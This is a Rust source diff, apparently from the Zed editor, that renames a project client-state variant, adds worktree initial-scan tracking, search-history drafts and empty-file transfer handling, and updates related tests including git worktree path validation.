- | ProjectClientState::Remote { remote_id, .. } => Some(remote_id),
+ | ProjectClientState::Collab { remote_id, .. } => Some(remote_id),
}
}
@@ -2213,7 +2220,7 @@ impl Project {
#[inline]
pub fn replica_id(&self) -> ReplicaId {
match self.client_state {
- ProjectClientState::Remote { replica_id, .. } => replica_id,
+ ProjectClientState::Collab { replica_id, .. } => replica_id,
_ => {
if self.remote_client.is_some() {
ReplicaId::REMOTE_SERVER
@@ -2287,6 +2294,32 @@ impl Project {
self.worktree_store.read(cx).visible_worktrees(cx)
}
+ pub fn default_path_list(&self, cx: &App) -> PathList {
+ let worktree_roots = self
+ .visible_worktrees(cx)
+ .sorted_by(|left, right| {
+ left.read(cx)
+ .is_single_file()
+ .cmp(&right.read(cx).is_single_file())
+ })
+ .filter_map(|worktree| {
+ let worktree = worktree.read(cx);
+ let path = worktree.abs_path();
+ if worktree.is_single_file() {
+ Some(path.parent()?.to_path_buf())
+ } else {
+ Some(path.to_path_buf())
+ }
+ })
+ .collect::<Vec<_>>();
+
+ if worktree_roots.is_empty() {
+ PathList::new(&[paths::home_dir().as_path()])
+ } else {
+ PathList::new(&worktree_roots)
+ }
+ }
+
#[inline]
pub fn worktree_for_root_name(&self, root_name: &str, cx: &App) -> Option<Entity<Worktree>> {
self.visible_worktrees(cx)
@@ -2727,7 +2760,7 @@ impl Project {
} else {
Capability::ReadOnly
};
- if let ProjectClientState::Remote { capability, .. } = &mut self.client_state {
+ if let ProjectClientState::Collab { capability, .. } = &mut self.client_state {
if *capability == new_capability {
return;
}
@@ -2740,7 +2773,7 @@ impl Project {
}
fn disconnected_from_host_internal(&mut self, cx: &mut App) {
- if let ProjectClientState::Remote {
+ if let ProjectClientState::Collab {
sharing_has_stopped,
..
} = &mut self.client_state
@@ -2767,7 +2800,7 @@ impl Project {
#[inline]
pub fn is_disconnected(&self, cx: &App) -> bool {
match &self.client_state {
- ProjectClientState::Remote {
+ ProjectClientState::Collab {
sharing_has_stopped,
..
} => *sharing_has_stopped,
@@ -2789,7 +2822,7 @@ impl Project {
#[inline]
pub fn capability(&self) -> Capability {
match &self.client_state {
- ProjectClientState::Remote { capability, .. } => *capability,
+ ProjectClientState::Collab { capability, .. } => *capability,
ProjectClientState::Shared { .. } | ProjectClientState::Local => Capability::ReadWrite,
}
}
@@ -2805,7 +2838,7 @@ impl Project {
ProjectClientState::Local | ProjectClientState::Shared { .. } => {
self.remote_client.is_none()
}
- ProjectClientState::Remote { .. } => false,
+ ProjectClientState::Collab { .. } => false,
}
}
@@ -2816,7 +2849,7 @@ impl Project {
ProjectClientState::Local | ProjectClientState::Shared { .. } => {
self.remote_client.is_some()
}
- ProjectClientState::Remote { .. } => false,
+ ProjectClientState::Collab { .. } => false,
}
}
@@ -2825,7 +2858,7 @@ impl Project {
pub fn is_via_collab(&self) -> bool {
match &self.client_state {
ProjectClientState::Local | ProjectClientState::Shared { .. } => false,
- ProjectClientState::Remote { .. } => true,
+ ProjectClientState::Collab { .. } => true,
}
}
@@ -3636,11 +3669,11 @@ impl Project {
event: &BufferEvent,
cx: &mut Context<Self>,
) -> Option<()> {
- if matches!(event, BufferEvent::Edited | BufferEvent::Reloaded) {
+ if matches!(event, BufferEvent::Edited { .. } | BufferEvent::Reloaded) {
self.request_buffer_diff_recalculation(&buffer, cx);
}
- if matches!(event, BufferEvent::Edited) {
+ if matches!(event, BufferEvent::Edited { .. }) {
cx.emit(Event::BufferEdited);
}
@@ -4498,7 +4531,7 @@ impl Project {
match &self.client_state {
ProjectClientState::Shared { .. } => true,
ProjectClientState::Local => false,
- ProjectClientState::Remote { .. } => true,
+ ProjectClientState::Collab { .. } => true,
}
}
@@ -5499,25 +5532,51 @@ impl Project {
let key = (worktree_id, path);
log::debug!("handle_create_file_for_peer: looking up key={:?}", key);
- let mut files = downloading_files.lock();
- log::trace!(
- "handle_create_file_for_peer: current downloading_files keys: {:?}",
- files.keys().collect::<Vec<_>>()
- );
+ let empty_file_destination: Option<PathBuf> = {
+ let mut files = downloading_files.lock();
+ log::trace!(
+ "handle_create_file_for_peer: current downloading_files keys: {:?}",
+ files.keys().collect::<Vec<_>>()
+ );
+
+ if let Some(file_entry) = files.get_mut(&key) {
+ file_entry.total_size = state.content_size;
+ file_entry.file_id = Some(state.id);
+ log::debug!(
+ "handle_create_file_for_peer: updated file entry: total_size={}, file_id={}",
+ state.content_size,
+ state.id
+ );
+ } else {
+ log::warn!(
+ "handle_create_file_for_peer: key={:?} not found in downloading_files",
+ key
+ );
+ }
+
+ if state.content_size == 0 {
+ // No chunks will arrive for an empty file; write it now.
+ files.remove(&key).map(|entry| entry.destination_path)
+ } else {
+ None
+ }
+ };
- if let Some(file_entry) = files.get_mut(&key) {
- file_entry.total_size = state.content_size;
- file_entry.file_id = Some(state.id);
+ if let Some(destination) = empty_file_destination {
log::debug!(
- "handle_create_file_for_peer: updated file entry: total_size={}, file_id={}",
- state.content_size,
- state.id
- );
- } else {
- log::warn!(
- "handle_create_file_for_peer: key={:?} not found in downloading_files",
- key
+ "handle_create_file_for_peer: writing empty file to {:?}",
+ destination
);
+ match smol::fs::write(&destination, &[] as &[u8]).await {
+ Ok(_) => log::info!(
+ "handle_create_file_for_peer: successfully wrote file to {:?}",
+ destination
+ ),
+ Err(e) => log::error!(
+ "handle_create_file_for_peer: failed to write empty file: {:?}",
+ e
+ ),
+ }
}
} else {
log::warn!("handle_create_file_for_peer: State has no file field");
@@ -5597,7 +5656,7 @@ impl Project {
fn synchronize_remote_buffers(&mut self, cx: &mut Context<Self>) -> Task<Result<()>> {
let project_id = match self.client_state {
- ProjectClientState::Remote {
+ ProjectClientState::Collab {
sharing_has_stopped,
remote_id,
..
@@ -164,6 +164,11 @@ impl Search {
let buffer = handle.read(cx);
if !buffers.is_searchable(&buffer.remote_id()) {
continue;
+ } else if buffer
+ .file()
+ .is_some_and(|file| file.disk_state().is_deleted())
+ {
+ continue;
} else if let Some(entry_id) = buffer.entry_id(cx) {
open_buffers.insert(entry_id);
} else {
@@ -586,6 +591,9 @@ impl Search {
.filter(|buffer| {
let b = buffer.read(cx);
if let Some(file) = b.file() {
+ if file.disk_state().is_deleted() {
+ return false;
+ }
if !search_query.match_path(file.path()) {
return false;
}
@@ -19,12 +19,19 @@ pub enum QueryInsertionBehavior {
#[derive(Default, Debug, Clone, PartialEq, Eq, Hash)]
pub struct SearchHistoryCursor {
selection: Option<usize>,
+ draft: Option<String>,
}
impl SearchHistoryCursor {
- /// Resets the selection to `None`.
+ /// Resets the selection to `None` and clears the draft.
pub fn reset(&mut self) {
self.selection = None;
+ self.draft = None;
+ }
+
+ /// Takes the stored draft query, if any.
+ pub fn take_draft(&mut self) -> Option<String> {
+ self.draft.take()
}
}
@@ -45,6 +52,8 @@ impl SearchHistory {
}
pub fn add(&mut self, cursor: &mut SearchHistoryCursor, search_string: String) {
+ cursor.draft = None;
+
if self.insertion_behavior == QueryInsertionBehavior::ReplacePreviousIfContains
&& let Some(previously_searched) = self.history.back_mut()
&& search_string.contains(previously_searched.as_str())
@@ -81,7 +90,23 @@ impl SearchHistory {
/// Get the previous history entry using the given `SearchHistoryCursor`.
/// Uses the last element in the history when there is no cursor.
- pub fn previous(&mut self, cursor: &mut SearchHistoryCursor) -> Option<&str> {
+ ///
+ /// `current_query` is the current text in the search editor. If it differs
+ /// from the history entry at the cursor position (or if the cursor has no
+ /// selection), it is saved as a draft so it can be restored later.
+ pub fn previous(
+ &mut self,
+ cursor: &mut SearchHistoryCursor,
+ current_query: &str,
+ ) -> Option<&str> {
+ let matches_history = cursor
+ .selection
+ .and_then(|i| self.history.get(i))
+ .is_some_and(|entry| entry == current_query);
+ if !matches_history {
+ cursor.draft = Some(current_query.to_string());
+ }
+
let prev_index = match cursor.selection {
Some(index) => index.checked_sub(1)?,
None => self.history.len().checked_sub(1)?,
@@ -985,6 +985,10 @@ impl ContextProvider for BasicContextProvider {
task_variables.insert(VariableName::File, path.to_string_lossy().into_owned());
}
+ if let Some(language) = buffer.language() {
+ task_variables.insert(VariableName::Language, language.name().to_string());
+ }
+
Task::ready(Ok(task_variables))
}
}
@@ -1,4 +1,5 @@
use std::{
+ future::Future,
path::{Path, PathBuf},
sync::{
Arc,
@@ -15,6 +16,7 @@ use gpui::{
WeakEntity,
};
use itertools::Either;
+use postage::{prelude::Stream as _, watch};
use rpc::{
AnyProtoClient, ErrorExt, TypedEnvelope,
proto::{self, REMOTE_SERVER_PROJECT_ID},
@@ -75,6 +77,7 @@ pub struct WorktreeStore {
#[allow(clippy::type_complexity)]
loading_worktrees:
HashMap<Arc<SanitizedPath>, Shared<Task<Result<Entity<Worktree>, Arc<anyhow::Error>>>>>,
+ initial_scan_complete: (watch::Sender<bool>, watch::Receiver<bool>),
state: WorktreeStoreState,
}
@@ -119,6 +122,7 @@ impl WorktreeStore {
worktrees_reordered: false,
scanning_enabled: true,
retain_worktrees,
+ initial_scan_complete: watch::channel_with(true),
state: WorktreeStoreState::Local { fs },
}
}
@@ -139,6 +143,7 @@ impl WorktreeStore {
worktrees_reordered: false,
scanning_enabled: true,
retain_worktrees,
+ initial_scan_complete: watch::channel_with(true),
state: WorktreeStoreState::Remote {
upstream_client,
upstream_project_id,
@@ -174,6 +179,57 @@ impl WorktreeStore {
pub fn disable_scanner(&mut self) {
self.scanning_enabled = false;
+ *self.initial_scan_complete.0.borrow_mut() = true;
+ }
+
+ /// Returns a future that resolves when all visible worktrees have completed
+ /// their initial scan (entries populated, git repos detected).
+ pub fn wait_for_initial_scan(&self) -> impl Future<Output = ()> + use<> {
+ let mut rx = self.initial_scan_complete.1.clone();
+ async move {
+ let mut done = *rx.borrow();
+ while !done {
+ if let Some(value) = rx.recv().await {
+ done = value;
+ } else {
+ break;
+ }
+ }
+ }
+ }
+
+ /// Returns whether all visible worktrees have completed their initial scan.
+ pub fn initial_scan_completed(&self) -> bool {
+ *self.initial_scan_complete.1.borrow()
+ }
+
+ /// Checks whether all visible worktrees have completed their initial scan
+ /// and no worktree creations are pending, and updates the watch channel accordingly.
+ fn update_initial_scan_state(&mut self, cx: &App) {
+ let complete = self.loading_worktrees.is_empty()
+ && self
+ .visible_worktrees(cx)
+ .all(|wt| wt.read(cx).completed_scan_id() >= 1);
+ *self.initial_scan_complete.0.borrow_mut() = complete;
+ }
+
+ /// Spawns a detached task that waits for a worktree's initial scan to complete,
+ /// then rechecks and updates the aggregate initial scan state.
+ fn observe_worktree_scan_completion(
+ &mut self,
+ worktree: &Entity<Worktree>,
+ cx: &mut Context<Self>,
+ ) {
+ let await_scan = worktree.update(cx, |worktree, _cx| worktree.wait_for_snapshot(1));
+ cx.spawn(async move |this, cx| {
+ await_scan.await.ok();
+ this.update(cx, |this, cx| {
+ this.update_initial_scan_state(cx);
+ })
+ .ok();
+ anyhow::Ok(())
+ })
+ .detach();
}
/// Iterates through all worktrees, including ones that don't appear in the project panel
@@ -554,12 +610,22 @@ impl WorktreeStore {
self.loading_worktrees
.insert(abs_path.clone(), task.shared());
+
+ if visible && self.scanning_enabled {
+ *self.initial_scan_complete.0.borrow_mut() = false;
+ }
}
let task = self.loading_worktrees.get(&abs_path).unwrap().clone();
cx.spawn(async move |this, cx| {
let result = task.await;
- this.update(cx, |this, _| this.loading_worktrees.remove(&abs_path))
- .ok();
+ this.update(cx, |this, cx| {
+ this.loading_worktrees.remove(&abs_path);
+ if !visible || !this.scanning_enabled || result.is_err() {
+ this.update_initial_scan_state(cx);
+ }
+ })
+ .ok();
+
match result {
Ok(worktree) => {
if !is_via_collab {
@@ -578,6 +644,13 @@ impl WorktreeStore {
);
});
}
+
+ this.update(cx, |this, cx| {
+ if this.scanning_enabled && visible {
+ this.observe_worktree_scan_completion(&worktree, cx);
+ }
+ })
+ .ok();
}
Ok(worktree)
}
@@ -768,6 +841,7 @@ impl WorktreeStore {
false
}
});
+ self.update_initial_scan_state(cx);
self.send_project_updates(cx);
}
@@ -3,7 +3,7 @@ mod go_locator {
use dap::{DapLocator, adapters::DebugAdapterName};
use gpui::TestAppContext;
use project::debugger::locators::go::{DelveLaunchRequest, GoLocator};
- use task::{HideStrategy, RevealStrategy, RevealTarget, Shell, TaskTemplate};
+ use task::{HideStrategy, RevealStrategy, RevealTarget, SaveStrategy, Shell, TaskTemplate};
#[gpui::test]
async fn test_create_scenario_for_go_build(_: &mut TestAppContext) {
let locator = GoLocator;
@@ -22,6 +22,7 @@ mod go_locator {
tags: vec![],
show_summary: true,
show_command: true,
+ save: SaveStrategy::default(),
};
let scenario = locator
@@ -49,6 +50,7 @@ mod go_locator {
tags: vec![],
show_summary: true,
show_command: true,
+ save: SaveStrategy::default(),
};
let scenario = locator
@@ -187,6 +189,7 @@ mod go_locator {
tags: vec![],
show_summary: true,
show_command: true,
+ save: SaveStrategy::default(),
};
let scenario = locator
@@ -221,6 +224,7 @@ mod python_locator {
shell: task::Shell::System,
show_summary: false,
show_command: false,
+ save: task::SaveStrategy::default(),
};
let expected_scenario = DebugScenario {
@@ -10,7 +10,6 @@ impl ExternalAgentServer for NoopExternalAgent {
fn get_command(
&mut self,
_extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
_cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -28,7 +27,7 @@ impl ExternalAgentServer for NoopExternalAgent {
#[test]
fn external_agent_server_name_display() {
- let name = ExternalAgentServerName(SharedString::from("Ext: Tool"));
+ let name = AgentId(SharedString::from("Ext: Tool"));
let mut s = String::new();
write!(&mut s, "{name}").unwrap();
assert_eq!(s, "Ext: Tool");
@@ -40,7 +39,7 @@ fn sync_extension_agents_removes_previous_extension_entries() {
// Seed with a couple of agents that will be replaced by extensions
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("foo-agent")),
+ AgentId(SharedString::from("foo-agent")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Custom,
@@ -49,7 +48,7 @@ fn sync_extension_agents_removes_previous_extension_entries() {
),
);
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("bar-agent")),
+ AgentId(SharedString::from("bar-agent")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Custom,
@@ -58,7 +57,7 @@ fn sync_extension_agents_removes_previous_extension_entries() {
),
);
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("custom")),
+ AgentId(SharedString::from("custom")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Custom,
@@ -9,14 +9,14 @@ use std::{any::Any, path::PathBuf, sync::Arc};
#[test]
fn extension_agent_constructs_proper_display_names() {
// Verify the display name format for extension-provided agents
- let name1 = ExternalAgentServerName(SharedString::from("Extension: Agent"));
+ let name1 = AgentId(SharedString::from("Extension: Agent"));
assert!(name1.0.contains(": "));
- let name2 = ExternalAgentServerName(SharedString::from("MyExt: MyAgent"));
+ let name2 = AgentId(SharedString::from("MyExt: MyAgent"));
assert_eq!(name2.0, "MyExt: MyAgent");
// Non-extension agents shouldn't have the separator
- let custom = ExternalAgentServerName(SharedString::from("custom"));
+ let custom = AgentId(SharedString::from("custom"));
assert!(!custom.0.contains(": "));
}
@@ -26,7 +26,6 @@ impl ExternalAgentServer for NoopExternalAgent {
fn get_command(
&mut self,
_extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
_cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -48,7 +47,7 @@ fn sync_removes_only_extension_provided_agents() {
// Seed with extension agents (contain ": ") and custom agents (don't contain ": ")
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("Ext1: Agent1")),
+ AgentId(SharedString::from("Ext1: Agent1")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Extension,
@@ -57,7 +56,7 @@ fn sync_removes_only_extension_provided_agents() {
),
);
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("Ext2: Agent2")),
+ AgentId(SharedString::from("Ext2: Agent2")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Extension,
@@ -66,7 +65,7 @@ fn sync_removes_only_extension_provided_agents() {
),
);
store.external_agents.insert(
- ExternalAgentServerName(SharedString::from("custom-agent")),
+ AgentId(SharedString::from("custom-agent")),
ExternalAgentEntry::new(
Box::new(NoopExternalAgent) as Box<dyn ExternalAgentServer>,
ExternalAgentSource::Custom,
@@ -85,7 +84,7 @@ fn sync_removes_only_extension_provided_agents() {
assert!(
store
.external_agents
- .contains_key(&ExternalAgentServerName(SharedString::from("custom-agent")))
+ .contains_key(&AgentId(SharedString::from("custom-agent")))
);
}
@@ -118,7 +117,7 @@ fn archive_launcher_constructs_with_all_fields() {
};
// Verify display name construction
- let expected_name = ExternalAgentServerName(SharedString::from("GitHub Agent"));
+ let expected_name = AgentId(SharedString::from("GitHub Agent"));
assert_eq!(expected_name.0, "GitHub Agent");
}
@@ -171,7 +170,7 @@ async fn archive_agent_uses_extension_and_agent_id_for_cache_key(cx: &mut TestAp
fn sync_extension_agents_registers_archive_launcher() {
use extension::AgentServerManifestEntry;
- let expected_name = ExternalAgentServerName(SharedString::from("Release Agent"));
+ let expected_name = AgentId(SharedString::from("Release Agent"));
assert_eq!(expected_name.0, "Release Agent");
// Verify the manifest entry structure for archive-based installation
@@ -1176,14 +1176,13 @@ mod git_traversal {
}
mod git_worktrees {
- use std::path::PathBuf;
-
use fs::FakeFs;
use gpui::TestAppContext;
+ use project::worktrees_directory_for_repo;
use serde_json::json;
use settings::SettingsStore;
+ use std::path::{Path, PathBuf};
use util::path;
-
fn init_test(cx: &mut gpui::TestAppContext) {
zlog::init_test();
@@ -1193,6 +1192,48 @@ mod git_worktrees {
});
}
+ #[test]
+ fn test_validate_worktree_directory() {
+ let work_dir = Path::new("/code/my-project");
+
+ // Valid: sibling
+ assert!(worktrees_directory_for_repo(work_dir, "../worktrees").is_ok());
+
+ // Valid: subdirectory
+ assert!(worktrees_directory_for_repo(work_dir, ".git/zed-worktrees").is_ok());
+ assert!(worktrees_directory_for_repo(work_dir, "my-worktrees").is_ok());
+
+ // Invalid: just ".." would resolve back to the working directory itself
+ let err = worktrees_directory_for_repo(work_dir, "..").unwrap_err();
+ assert!(err.to_string().contains("must not be \"..\""));
+
+ // Invalid: ".." with trailing separators
+ let err = worktrees_directory_for_repo(work_dir, "..\\").unwrap_err();
+ assert!(err.to_string().contains("must not be \"..\""));
+ let err = worktrees_directory_for_repo(work_dir, "../").unwrap_err();
+ assert!(err.to_string().contains("must not be \"..\""));
+
+ // Invalid: empty string would resolve to the working directory itself
+ let err = worktrees_directory_for_repo(work_dir, "").unwrap_err();
+ assert!(err.to_string().contains("must not be empty"));
+
+ // Invalid: absolute path
+ let err = worktrees_directory_for_repo(work_dir, "/tmp/worktrees").unwrap_err();
+ assert!(err.to_string().contains("relative path"));
+
+ // Invalid: "/" is absolute on Unix
+ let err = worktrees_directory_for_repo(work_dir, "/").unwrap_err();
+ assert!(err.to_string().contains("relative path"));
+
+ // Invalid: "///" is absolute
+ let err = worktrees_directory_for_repo(work_dir, "///").unwrap_err();
+ assert!(err.to_string().contains("relative path"));
+
+ // Invalid: escapes too far up
+ let err = worktrees_directory_for_repo(work_dir, "../../other-project/wt").unwrap_err();
+ assert!(err.to_string().contains("outside"));
+ }
+
#[gpui::test]
async fn test_git_worktrees_list_and_create(cx: &mut TestAppContext) {
init_test(cx);
@@ -1221,12 +1262,13 @@ mod git_worktrees {
assert_eq!(worktrees.len(), 1);
assert_eq!(worktrees[0].path, PathBuf::from(path!("/root")));
- let worktree_directory = PathBuf::from(path!("/root"));
+ let worktrees_directory = PathBuf::from(path!("/root"));
+ let worktree_1_directory = worktrees_directory.join("feature-branch");
cx.update(|cx| {
repository.update(cx, |repository, _| {
repository.create_worktree(
"feature-branch".to_string(),
- worktree_directory.clone(),
+ worktree_1_directory.clone(),
Some("abc123".to_string()),
)
})
@@ -1244,15 +1286,19 @@ mod git_worktrees {
.unwrap();
assert_eq!(worktrees.len(), 2);
assert_eq!(worktrees[0].path, PathBuf::from(path!("/root")));
- assert_eq!(worktrees[1].path, worktree_directory.join("feature-branch"));
- assert_eq!(worktrees[1].ref_name.as_ref(), "refs/heads/feature-branch");
+ assert_eq!(worktrees[1].path, worktree_1_directory);
+ assert_eq!(
+ worktrees[1].ref_name,
+ Some("refs/heads/feature-branch".into())
+ );
assert_eq!(worktrees[1].sha.as_ref(), "abc123");
+ let worktree_2_directory = worktrees_directory.join("bugfix-branch");
cx.update(|cx| {
repository.update(cx, |repository, _| {
repository.create_worktree(
"bugfix-branch".to_string(),
- worktree_directory.clone(),
+ worktree_2_directory.clone(),
None,
)
})
@@ -1271,24 +1317,18 @@ mod git_worktrees {
.unwrap();
assert_eq!(worktrees.len(), 3);
- let feature_worktree = worktrees
+ let worktree_1 = worktrees
.iter()
- .find(|worktree| worktree.ref_name.as_ref() == "refs/heads/feature-branch")
+ .find(|worktree| worktree.ref_name == Some("refs/heads/feature-branch".into()))
.expect("should find feature-branch worktree");
- assert_eq!(
- feature_worktree.path,
- worktree_directory.join("feature-branch")
- );
+ assert_eq!(worktree_1.path, worktree_1_directory);
- let bugfix_worktree = worktrees
+ let worktree_2 = worktrees
.iter()
- .find(|worktree| worktree.ref_name.as_ref() == "refs/heads/bugfix-branch")
+ .find(|worktree| worktree.ref_name == Some("refs/heads/bugfix-branch".into()))
.expect("should find bugfix-branch worktree");
- assert_eq!(
- bugfix_worktree.path,
- worktree_directory.join("bugfix-branch")
- );
- assert_eq!(bugfix_worktree.sha.as_ref(), "fake-sha");
+ assert_eq!(worktree_2.path, worktree_2_directory);
+ assert_eq!(worktree_2.sha.as_ref(), "fake-sha");
}
use crate::Project;
@@ -1498,3 +1538,113 @@ mod trust_tests {
});
}
}
+
+mod resolve_worktree_tests {
+ use fs::FakeFs;
+ use gpui::TestAppContext;
+ use project::{git_store::resolve_git_worktree_to_main_repo, linked_worktree_short_name};
+ use serde_json::json;
+ use std::path::{Path, PathBuf};
+
+ #[gpui::test]
+ async fn test_resolve_git_worktree_to_main_repo(cx: &mut TestAppContext) {
+ let fs = FakeFs::new(cx.executor());
+ // Set up a main repo with a worktree entry
+ fs.insert_tree(
+ "/main-repo",
+ json!({
+ ".git": {
+ "worktrees": {
+ "feature": {
+ "commondir": "../../",
+ "HEAD": "ref: refs/heads/feature"
+ }
+ }
+ },
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+ // Set up a worktree checkout pointing back to the main repo
+ fs.insert_tree(
+ "/worktree-checkout",
+ json!({
+ ".git": "gitdir: /main-repo/.git/worktrees/feature",
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ let result =
+ resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/worktree-checkout")).await;
+ assert_eq!(result, Some(PathBuf::from("/main-repo")));
+ }
+
+ #[gpui::test]
+ async fn test_resolve_git_worktree_normal_repo_returns_none(cx: &mut TestAppContext) {
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/repo",
+ json!({
+ ".git": {},
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ let result = resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/repo")).await;
+ assert_eq!(result, None);
+ }
+
+ #[gpui::test]
+ async fn test_resolve_git_worktree_no_git_returns_none(cx: &mut TestAppContext) {
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/plain",
+ json!({
+ "src": { "main.rs": "" }
+ }),
+ )
+ .await;
+
+ let result = resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/plain")).await;
+ assert_eq!(result, None);
+ }
+
+ #[gpui::test]
+ async fn test_resolve_git_worktree_nonexistent_returns_none(cx: &mut TestAppContext) {
+ let fs = FakeFs::new(cx.executor());
+
+ let result =
+ resolve_git_worktree_to_main_repo(fs.as_ref(), Path::new("/does-not-exist")).await;
+ assert_eq!(result, None);
+ }
+
+ #[test]
+ fn test_linked_worktree_short_name() {
+ let examples = [
+ (
+ "/home/bob/zed",
+ "/home/bob/worktrees/olivetti/zed",
+ Some("olivetti".into()),
+ ),
+ ("/home/bob/zed", "/home/bob/zed2", Some("zed2".into())),
+ (
+ "/home/bob/zed",
+ "/home/bob/worktrees/zed/selectric",
+ Some("selectric".into()),
+ ),
+ ("/home/bob/zed", "/home/bob/zed", None),
+ ];
+ for (main_worktree_path, linked_worktree_path, expected) in examples {
+ let short_name = linked_worktree_short_name(
+ Path::new(main_worktree_path),
+ Path::new(linked_worktree_path),
+ );
+ assert_eq!(
+ short_name, expected,
+ "short name for {linked_worktree_path:?}, linked worktree of {main_worktree_path:?}, should be {expected:?}"
+ );
+ }
+ }
+}
@@ -26,7 +26,7 @@ use buffer_diff::{
};
use collections::{BTreeSet, HashMap, HashSet};
use encoding_rs;
-use fs::FakeFs;
+use fs::{FakeFs, PathEventKind};
use futures::{StreamExt, future};
use git::{
GitHostingProviderRegistry,
@@ -76,7 +76,7 @@ use std::{
path::{Path, PathBuf},
rc::Rc,
str::FromStr,
- sync::{Arc, OnceLock},
+ sync::{Arc, OnceLock, atomic},
task::Poll,
time::Duration,
};
@@ -126,6 +126,63 @@ async fn test_block_via_smol(cx: &mut gpui::TestAppContext) {
task.await;
}
+#[gpui::test]
+async fn test_default_session_work_dirs_prefers_directory_worktrees_over_single_file_parents(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/root"),
+ json!({
+ "dir-project": {
+ "src": {
+ "main.rs": "fn main() {}"
+ }
+ },
+ "single-file.rs": "fn helper() {}"
+ }),
+ )
+ .await;
+
+ let project = Project::test(
+ fs,
+ [
+ Path::new(path!("/root/single-file.rs")),
+ Path::new(path!("/root/dir-project")),
+ ],
+ cx,
+ )
+ .await;
+
+ let work_dirs = project.read_with(cx, |project, cx| project.default_path_list(cx));
+ let ordered_paths = work_dirs.ordered_paths().cloned().collect::<Vec<_>>();
+
+ assert_eq!(
+ ordered_paths,
+ vec![
+ PathBuf::from(path!("/root/dir-project")),
+ PathBuf::from(path!("/root")),
+ ]
+ );
+}
+
+#[gpui::test]
+async fn test_default_session_work_dirs_falls_back_to_home_for_empty_project(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ let project = Project::test(fs, [], cx).await;
+
+ let work_dirs = project.read_with(cx, |project, cx| project.default_path_list(cx));
+ let ordered_paths = work_dirs.ordered_paths().cloned().collect::<Vec<_>>();
+
+ assert_eq!(ordered_paths, vec![paths::home_dir().to_path_buf()]);
+}
+
// NOTE:
// While POSIX symbolic links are somewhat supported on Windows, they are an opt in by the user, and thus
// we assume that they are not supported out of the box.
@@ -2072,6 +2129,97 @@ async fn test_language_server_tilde_path(cx: &mut gpui::TestAppContext) {
);
}
+#[gpui::test]
+async fn test_rescan_fs_change_is_reported_to_language_servers_as_changed(
+ cx: &mut gpui::TestAppContext,
+) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ path!("/the-root"),
+ json!({
+ "Cargo.lock": "",
+ "src": {
+ "a.rs": "",
+ }
+ }),
+ )
+ .await;
+
+ let project = Project::test(fs.clone(), [path!("/the-root").as_ref()], cx).await;
+ let (language_registry, _lsp_store) = project.read_with(cx, |project, _| {
+ (project.languages().clone(), project.lsp_store())
+ });
+ language_registry.add(rust_lang());
+ let mut fake_servers = language_registry.register_fake_lsp(
+ "Rust",
+ FakeLspAdapter {
+ name: "the-language-server",
+ ..Default::default()
+ },
+ );
+
+ cx.executor().run_until_parked();
+
+ project
+ .update(cx, |project, cx| {
+ project.open_local_buffer_with_lsp(path!("/the-root/src/a.rs"), cx)
+ })
+ .await
+ .unwrap();
+
+ let fake_server = fake_servers.next().await.unwrap();
+ cx.executor().run_until_parked();
+
+ let file_changes = Arc::new(Mutex::new(Vec::new()));
+ fake_server
+ .request::<lsp::request::RegisterCapability>(
+ lsp::RegistrationParams {
+ registrations: vec![lsp::Registration {
+ id: Default::default(),
+ method: "workspace/didChangeWatchedFiles".to_string(),
+ register_options: serde_json::to_value(
+ lsp::DidChangeWatchedFilesRegistrationOptions {
+ watchers: vec![lsp::FileSystemWatcher {
+ glob_pattern: lsp::GlobPattern::String(
+ path!("/the-root/Cargo.lock").to_string(),
+ ),
+ kind: None,
+ }],
+ },
+ )
+ .ok(),
+ }],
+ },
+ DEFAULT_LSP_REQUEST_TIMEOUT,
+ )
+ .await
+ .into_response()
+ .unwrap();
+ fake_server.handle_notification::<lsp::notification::DidChangeWatchedFiles, _>({
+ let file_changes = file_changes.clone();
+ move |params, _| {
+ let mut file_changes = file_changes.lock();
+ file_changes.extend(params.changes);
+ }
+ });
+
+ cx.executor().run_until_parked();
+ assert_eq!(mem::take(&mut *file_changes.lock()), &[]);
+
+ fs.emit_fs_event(path!("/the-root/Cargo.lock"), Some(PathEventKind::Rescan));
+ cx.executor().run_until_parked();
+
+ assert_eq!(
+ &*file_changes.lock(),
+ &[lsp::FileEvent {
+ uri: lsp::Uri::from_file_path(path!("/the-root/Cargo.lock")).unwrap(),
+ typ: lsp::FileChangeType::CHANGED,
+ }]
+ );
+}
+
#[gpui::test]
async fn test_reporting_fs_changes_to_language_servers(cx: &mut gpui::TestAppContext) {
init_test(cx);
